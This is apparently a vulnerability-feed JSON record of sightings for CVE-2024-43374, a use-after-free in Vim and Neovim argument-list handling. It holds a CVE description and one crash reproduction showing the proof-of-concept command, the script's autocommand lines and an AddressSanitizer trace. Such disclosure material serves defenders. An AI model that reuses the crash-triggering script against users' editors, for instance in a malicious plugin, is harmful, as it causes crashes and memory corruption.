{"vulnerability": "cve-2024-43374", "sightings": [{"uuid": "65b3e556-5294-43b2-aa21-13d9a7f7ab04", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-43374", "type": "seen", "source": "https://gist.github.com/zhuozhenwei/fac94632a3c276db37727514a35608fd", "content": "Command:\n./nvim-0.10.4 -u NONE -i NONE -n -m -X -V20 -e -s -S poc -c qa!\n\n=== OUTPUT ===\nExecuting:     vnoremenu PopUp.Cut                     \"+x\n\nExecuting:     vnoremenu PopUp.Copy                    \"+y\n\nExecuting:     anoremenu PopUp.Paste                   \"+gP\n\nExecuting:     vnoremenu PopUp.Paste                   \"+P\n\nExecuting:     vnoremenu PopUp.Delete                  \"_x\n\nExecuting:     nnoremenu PopUp.Select\\ All             ggVG\n\nExecuting:     vnoremenu PopUp.Select\\ All             gg0oG$\n\nExecuting:     inoremenu PopUp.Select\\ All             VG\n\nExecuting:     anoremenu PopUp.Inspect                 Inspect\n\nExecuting:     anoremenu PopUp.-1-                     \n\nExecuting:     anoremenu PopUp.How-to\\ disable\\ mouse  help disable-mouse\n\nExecuting:   \n\nExecuting: so poc\n\nline 0: sourcing \"poc\"\nline 1:  \n\nline 2: an^?|\n\nError detected while processing command line..script /home/zzw/Desktop/CVEID2426/CVE-2024-43374/poc:\nline    2:\nE329: No menu \"^?\"\nline 3: au    BufNew  ile,,3,^S,*,*,.gRowseiq,*,*.^la^?^I:bw\n\nline 4: n^R^R^R^R^R^R^R^R^R^Rightbw\n\nExecuting BufNew Autocommands for \"*\"\nautocommand :bw\n\nExecuting: :bw\n\nExecuting: unlet! b:keymap_name\n\nautocommand :bw\n\nExecuting: :bw\n\nExecuting: unlet! b:keymap_name\n\nExecuting BufNew Autocommands for \"*\"\nautocommand :bw\n\nExecuting: :bw\n\nExecuting: unlet! b:keymap_name\n\nExecuting BufNew Autocommands for \"*\"\nautocommand :bw\n\nExecuting: :bw\n\nExecuting: unlet! b:keymap_name\n\nautocommand :bw\n\nExecuting: :bw\n\nExecuting: unlet! b:keymap_name\n\nExecuting BufNew Autocommands for \"*\"\nautocommand :bw\n\nExecuting: :bw\n\nExecuting: unlet! b:keymap_name\n\nline 5: we^?\n\nline    5:\nE492: Not an editor command: we^?\nline 6: 0sv]&lt;88&gt;N,\n\nExecuting BufNew Autocommands for \"*\"\nautocommand :bw\n\nExecuting: :bw\n\nExecuting: unlet! b:keymap_name\n\nautocommand :bw\n\nExecuting: :bw\n\nExecuting: unlet! b:keymap_name\n\nExecuting BufNew Autocommands for \"*\"\nautocommand :bw\n\nExecuting: :bw\n\nExecuting: unlet! b:keymap_name\n\nline    6:\nE444: Cannot close last window\nline 7: \n\nline 8: diffs\n\nline 8: set sbo+=hor\n\nline 9: daru&lt;82&gt;e^Hw/\n\nline    9:\nE492: Not an editor command: daru&lt;82&gt;e^Hw/\nline 10: lv}$}\"\n\n\"\"\"\" [New]\nCannot open file \"\"\"\nline   10:\nE480: No match: $\nline 11: ;$\n\nline 12: dif&lt;99&gt;s@^?]^Pcl{{0^\\db\n\nline   12:\nE488: Trailing characters: &lt;99&gt;s@^?]^Pcl{{0^\\db: dif&lt;99&gt;s@^?]^Pcl{{0^\\db\nline 13: argl{{0}2\n\nExecuting command: \"[[ ${BASH_VERSINFO[0]} -ge 4 ]] &amp;&amp; shopt -s globstar; vimglob() { while [ $# -ge 1 ]; do echo \"$1\"; shift; done }; vimglob &gt;/tmp/nvim.zzw/oo5n4h/0 {{0}2\"\n\nExecuting BufNew Autocommands for \"*\"\nautocommand :bw\n\nExecuting: :bw\n\nError detected while processing command line..script /home/zzw/Desktop/CVEID2426/CVE-2024-43374/poc[13]..BufNew Autocommands for \"*\":\nE1156: Cannot change the argument list recursively\nExecuting: diffoff!\n\nExecuting: set sbo-=hor\n\nExecuting: unlet! b:keymap_name\n\nautocommand :bw\n\nExecuting: :bw\n\nExecuting: unlet! b:keymap_name\n\nExecuting BufNew Autocommands for \"*\"\nautocommand :bw\n\nExecuting: :bw\n\nExecuting: unlet! b:keymap_name\n=================================================================\n==107413==ERROR: AddressSanitizer: heap-use-after-free on address 0x603000005b40 at pc 0x00000065f45d bp 0x7ffdd2eb5d30 sp 0x7ffdd2eb5d28\nREAD of size 8 at 0x603000005b40 thread T0\n    #0 0x65f45c in alist_add /home/zzw/Desktop/neovim/build/../src/nvim/arglist.c:221:5\n    #1 0x65f26e in alist_set /home/zzw/Desktop/neovim/build/../src/nvim/arglist.c:191:7\n    #2 0x66014a in do_arglist /home/zzw/Desktop/neovim/build/../src/nvim/arglist.c:468:7\n    #3 0x662209 in ex_next /home/zzw/Desktop/neovim/build/../src/nvim/arglist.c:705:11\n    #4 0x661405 in ex_args /home/zzw/Desktop/neovim/build/../src/nvim/arglist.c:546:5\n    #5 0x9d2f8a in execute_cmd0 /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1706:7\n    #6 0x9c021d in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:2375:7\n    #7 0x9b5ac7 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:665:20\n    #8 0xfab0ea in do_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:2240:5\n    #9 0xfa76d6 in cmd_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:1796:14\n    #10 0xfa7430 in ex_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:1804:3\n    #11 0x9d2f8a in execute_cmd0 /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1706:7\n    #12 0x9c021d in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:2375:7\n    #13 0x9b5ac7 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:665:20\n    #14 0x9b9153 in do_cmdline_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:374:10\n    #15 0xc0acf9 in exe_commands /home/zzw/Desktop/neovim/build/../src/nvim/main.c:1909:5\n    #16 0xbfedf4 in main /home/zzw/Desktop/neovim/build/../src/nvim/main.c:594:5\n    #17 0x7f99cebb7082 in __libc_start_main /build/glibc-B3wQXB/glibc-2.31/csu/../csu/libc-start.c:308:16\n    #18 0x47000d in _start (/home/zzw/Desktop/NVIM-EXE/nvim-0.10.4+0x47000d)\n\n0x603000005b40 is located 16 bytes inside of 32-byte region [0x603000005b30,0x603000005b50)\nfreed by thread T0 here:\n    #0 0x4e84cd in free (/home/zzw/Desktop/NVIM-EXE/nvim-0.10.4+0x4e84cd)\n    #1 0xce9119 in xfree /home/zzw/Desktop/neovim/build/../src/nvim/memory.c:144:3\n    #2 0x65ede3 in alist_unlink /home/zzw/Desktop/neovim/build/../src/nvim/arglist.c:116:5\n    #3 0x12ce2de in win_free /home/zzw/Desktop/neovim/build/../src/nvim/window.c:5207:3\n    #4 0x12c48bb in win_free_mem /home/zzw/Desktop/neovim/build/../src/nvim/window.c:3100:3\n    #5 0x12a0a8c in win_close /home/zzw/Desktop/neovim/build/../src/nvim/window.c:2858:8\n    #6 0x693e43 in do_buffer /home/zzw/Desktop/neovim/build/../src/nvim/buffer.c:1391:11\n    #7 0x6984f7 in do_bufdel /home/zzw/Desktop/neovim/build/../src/nvim/buffer.c:1057:5\n    #8 0x9ea833 in ex_bunload /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:4467:17\n    #9 0x9d2f8a in execute_cmd0 /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1706:7\n    #10 0x9c021d in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:2375:7\n    #11 0x9b5ac7 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:665:20\n    #12 0x67b3df in apply_autocmds_group /home/zzw/Desktop/neovim/build/../src/nvim/autocmd.c:1830:5\n    #13 0x67ff56 in apply_autocmds /home/zzw/Desktop/neovim/build/../src/nvim/autocmd.c:1498:10\n    #14 0x69802d in buflist_new /home/zzw/Desktop/neovim/build/../src/nvim/buffer.c:2009:9\n    #15 0x6a4d75 in buflist_add /home/zzw/Desktop/neovim/build/../src/nvim/buffer.c:3091:16\n    #16 0x65f42d in alist_add /home/zzw/Desktop/neovim/build/../src/nvim/arglist.c:222:7\n    #17 0x65f26e in alist_set /home/zzw/Desktop/neovim/build/../src/nvim/arglist.c:191:7\n    #18 0x66014a in do_arglist /home/zzw/Desktop/neovim/build/../src/nvim/arglist.c:468:7\n    #19 0x662209 in ex_next /home/zzw/Desktop/neovim/build/../src/nvim/arglist.c:705:11\n    #20 0x661405 in ex_args /home/zzw/Desktop/neovim/build/../src/nvim/arglist.c:546:5\n    #21 0x9d2f8a in execute_cmd0 /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1706:7\n    #22 0x9c021d in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:2375:7\n    #23 0x9b5ac7 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:665:20\n    #24 0xfab0ea in do_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:2240:5\n    #25 0xfa76d6 in cmd_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:1796:14\n    #26 0xfa7430 in ex_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:1804:3\n    #27 0x9d2f8a in execute_cmd0 /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1706:7\n    #28 0x9c021d in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:2375:7\n    #29 0x9b5ac7 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:665:20\n\npreviously allocated by thread T0 here:\n    #0 0x4e874d in malloc (/home/zzw/Desktop/NVIM-EXE/nvim-0.10.4+0x4e874d)\n    #1 0xce8ef7 in try_malloc /home/zzw/Desktop/neovim/build/../src/nvim/memory.c:98:15\n    #2 0xce90c4 in xmalloc /home/zzw/Desktop/neovim/build/../src/nvim/memory.c:132:15\n    #3 0x65ee01 in alist_new /home/zzw/Desktop/neovim/build/../src/nvim/arglist.c:123:21\n    #4 0x66136a in ex_args /home/zzw/Desktop/neovim/build/../src/nvim/arglist.c:536:7\n    #5 0x9d2f8a in execute_cmd0 /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1706:7\n    #6 0x9c021d in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:2375:7\n    #7 0x9b5ac7 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:665:20\n    #8 0xfab0ea in do_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:2240:5\n    #9 0xfa76d6 in cmd_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:1796:14\n    #10 0xfa7430 in ex_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:1804:3\n    #11 0x9d2f8a in execute_cmd0 /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1706:7\n    #12 0x9c021d in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:2375:7\n    #13 0x9b5ac7 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:665:20\n    #14 0x9b9153 in do_cmdline_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:374:10\n    #15 0xc0acf9 in exe_commands /home/zzw/Desktop/neovim/build/../src/nvim/main.c:1909:5\n    #16 0xbfedf4 in main /home/zzw/Desktop/neovim/build/../src/nvim/main.c:594:5\n    #17 0x7f99cebb7082 in __libc_start_main /build/glibc-B3wQXB/glibc-2.31/csu/../csu/libc-start.c:308:16\n\nSUMMARY: AddressSanitizer: heap-use-after-free /home/zzw/Desktop/neovim/build/../src/nvim/arglist.c:221:5 in alist_add\nShadow bytes around the buggy address:\n  0x0c067fff8b10: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd\n  0x0c067fff8b20: fd fa fa fa fd fd fd fa fa fa fd fd fd fa fa fa\n  0x0c067fff8b30: 00 00 05 fa fa fa fd fd fd fa fa fa fd fd fd fd\n  0x0c067fff8b40: fa fa 00 00 02 fa fa fa fd fd fd fd fa fa 00 00\n  0x0c067fff8b50: 00 06 fa fa fd fd fd fd fa fa fd fd fd fa fa fa\n=&gt;0x0c067fff8b60: 00 00 04 fa fa fa fd fd[fd]fd fa fa fd fd fd fa\n  0x0c067fff8b70: fa fa 00 00 06 fa fa fa fd fd fd fa fa fa fd fd\n  0x0c067fff8b80: fd fa fa fa fd fd fd fd fa fa fd fd fd fd fa fa\n  0x0c067fff8b90: fd fd fd fd fa fa fd fd fd fa fa fa fd fd fd fa\n  0x0c067fff8ba0: fa fa fd fd fd fa fa fa fd fd fd fd fa fa fd fd\n  0x0c067fff8bb0: fd fa fa fa fd fd fd fd fa fa 00 00 00 04 fa fa\nShadow byte legend (one shadow byte represents 8 application bytes):\n  Addressable:           00\n  Partially addressable: 01 02 03 04 05 06 07 \n  Heap left redzone:       fa\n  Freed heap region:       fd\n  Stack left redzone:      f1\n  Stack mid redzone:       f2\n  Stack right redzone:     f3\n  Stack after return:      f5\n  Stack use after scope:   f8\n  Global redzone:          f9\n  Global init order:       f6\n  Poisoned by user:        f7\n  Container overflow:      fc\n  Array cookie:            ac\n  Intra object redzone:    bb\n  ASan internal:           fe\n  Left alloca redzone:     ca\n  Right alloca redzone:    cb\n  Shadow gap:              cc\n==107413==ABORTING", "creation_timestamp": "2026-06-08T10:57:49.000000Z"}, {"uuid": "a51afbac-c1bb-4b3a-a7c8-e8afa1af715c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-43374", "type": "seen", "source": "https://gist.github.com/jamincollins/eeeaa5b5a021f181d02cd557edf76515", "content": "", "creation_timestamp": "2025-07-09T21:28:20.000000Z"}, {"uuid": "c2fec622-a22a-4836-b28f-aaa3de78ba86", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-43374", "type": "seen", "source": "https://t.me/cvedetector/3316", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-43374 - \"Vim Use-After-Free Vulnerability\"\", \n  \"Content\": \"CVE ID : CVE-2024-43374 \nPublished : Aug. 16, 2024, 2:15 a.m. | 37\u00a0minutes ago \nDescription : The UNIX editor Vim prior to version 9.1.0678 has a use-after-free error in argument list handling. When adding a new file to the argument list, this triggers `Buf*` autocommands. If in such an autocommand the buffer that was just opened is closed (including the window where it is shown), this causes the window structure to be freed which contains a reference to the argument list that we are actually modifying. Once the autocommands are completed, the references to the window and argument list are no longer valid and as such cause an use-after-free. Impact is low since the user must either intentionally add some unusual autocommands that wipe a buffer during creation (either manually or by sourcing a malicious plugin), but it will crash Vim. The issue has been fixed as of Vim patch v9.1.0678. \nSeverity: 4.5 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"16 Aug 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-08-16T05:21:43.000000Z"}]}